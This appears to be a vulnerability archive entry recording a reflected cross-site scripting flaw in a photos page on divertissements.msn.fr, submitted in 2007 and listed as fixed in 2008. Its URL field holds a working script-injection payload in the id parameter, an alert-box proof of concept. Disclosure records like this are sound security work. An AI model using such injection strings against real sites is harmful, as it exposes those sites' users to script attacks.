divertissements.msn.fr cross-site-scripting (XSS) Vulnerability

Advertisements:

Security researcher TurkAtesi.Net, has submitted on 13/03/2007 a cross-site-scripting (XSS) vulnerability affecting divertissements.msn.fr, which at the time of submission ranked 1036 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/03/2007. It is currently fixed.

Date submitted: 13/03/2007

Date published: 13/03/2007

Date fixed: 30/05/2008

Status:

FIXED

Author: TurkAtesi.Net

Domain: divertissements.msn.fr

Category: XSS

Pagerank: 1036

URL: http://divertissements.msn.fr/disney/photos/default.asp?id="><script>alert('KiLiCaRsLaN')</script>

Click here to view the mirror

XSS Attacks
Cross Site Scripting Exploits and Defense

Website Fraud Loss Prevention